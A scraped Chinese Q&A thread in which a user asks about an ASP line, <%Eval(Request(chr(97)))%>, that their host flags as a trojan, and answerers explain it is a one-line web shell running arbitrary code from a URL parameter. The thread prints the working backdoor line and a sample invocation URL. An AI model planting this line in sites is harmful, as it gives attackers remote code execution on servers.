config.asp 上传不到空间,只有删除 <%Eval(Request(chr(97))) %> 这一段代码才行。这段代码什么意思?
<%Eval(Request(chr(97)))%>空间商那边说这段代码是木马标志,不知道怎么办了,删除了之后,网站打不开,提示没有授权。,百度了说是服务器配置问题,,可...
<%Eval(Request(chr(97))) %>
空间商 那边说这段代码是木马标志,不知道怎么办了,删除了之后,网站打不开,提示没有授权。,百度了说是服务器配置问题,,可是我们是租的服务器啊。。。 展开
空间商 那边说这段代码是木马标志,不知道怎么办了,删除了之后,网站打不开,提示没有授权。,百度了说是服务器配置问题,,可是我们是租的服务器啊。。。 展开
4个回答
展开全部
chr(97)是字母a,<%Eval(Request("a")) %>的意思,就是直接解析运行网址中a参数内的VBScript命令。比方说你在浏览器地址拦输入:
http://网址/config.asp?a=msgbox("hello")
运行后就会弹出一个对话框显示hello。当然这只是示例,如果a=后面放的是带有危险性的代码,你可以想象一下后果,所以这是很明显的带有木马特征的代码,一般负责任的空间提供商都会拦截这样的代码的。除非是你自己的服务器,或者是一些不正规的空间。
http://网址/config.asp?a=msgbox("hello")
运行后就会弹出一个对话框显示hello。当然这只是示例,如果a=后面放的是带有危险性的代码,你可以想象一下后果,所以这是很明显的带有木马特征的代码,一般负责任的空间提供商都会拦截这样的代码的。除非是你自己的服务器,或者是一些不正规的空间。
追问
谢谢,。,若是这样删除之后 应该没有影响才对啊。。可是删除之后上传了就出现这种情况了,你看看,。,
您未被授权查看该页
您不具备查看该目录或页面的权限,因为访问控制列表 (ACL) 对 Web 服务器上的该资源进行了配置。
请尝试以下操作:
如果您认为自己应该能够查看该目录或页面,请与网站管理员联系。
追答
首先,你要看一下你的网页在本地测试是否正常(自己用IIS搭建服务器或使用NextBox之类的调试工具),如果无法运行,那就是你的网页代码本身存在问题。
如果本地正常,放到空间上无法运行,那么就有两种可能:空间的设置有问题,如果你们无法自己对空间进行配置,建议换空间;也可能是asp代码对运行环境有特殊要求,这个就要找代码的设计者才能解决了。
补充说明一下,你这个网页含有这样明显的木马代码,说明它本身确实是有问题的,这完全就是个后门程序嘛!网页的来路清白吗?或许是你们本身就想搞这个?
再补充,从你在其他人那里的追问来看,你这个应该是个ASP的木马收信工具吧?那么就可以让代码设计者窃取你服务器上的数据,但愿我猜错了。另外,这类程序依赖于服务器的组件支持,比如Jmail之类的,如果服务器没有安装这种组件,那么你的代码是无法运行的。
本回答由提问者推荐
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
展开全部
chr(97)等同于a
那么可以理解为
request("a")
在加上eval的哈,就可以执行任意浏览器提交过来的数据了,这也是一句话木马的原理,估计你空间安全性比较高,所以上传不了
那么可以理解为
request("a")
在加上eval的哈,就可以执行任意浏览器提交过来的数据了,这也是一句话木马的原理,估计你空间安全性比较高,所以上传不了
更多追问追答
追问
谢谢,。,若是这样删除之后 应该没有影响才对啊。。可是删除之后上传了就出现这种情况了,你看看,。,
您未被授权查看该页
您不具备查看该目录或页面的权限,因为访问控制列表 (ACL) 对 Web 服务器上的该资源进行了配置。
请尝试以下操作:
如果您认为自己应该能够查看该目录或页面,请与网站管理员联系。
追答
那应该是你服务器的IIS设置问
题,和程序没有关系,可能是没有开启匿名访问
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
展开全部
将<%Eval(Request(chr(97))) %>直接改为<%Request(“a”)%>试试
你应该把这段代码上下完整的多贴上来一些。
又是这种改的网站太不靠普了。
你应该把这段代码上下完整的多贴上来一些。
又是这种改的网站太不靠普了。
更多追问追答
追问
试了 不行。。。
追答
多发上来些代码看看
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
展开全部
先在本地测试看看
在本地正常后再上传
在本地正常后再上传
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
更多回答(2)
推荐律师服务:
若未解决您的问题,请您详细描述您的问题,通过百度律临进行免费专业咨询
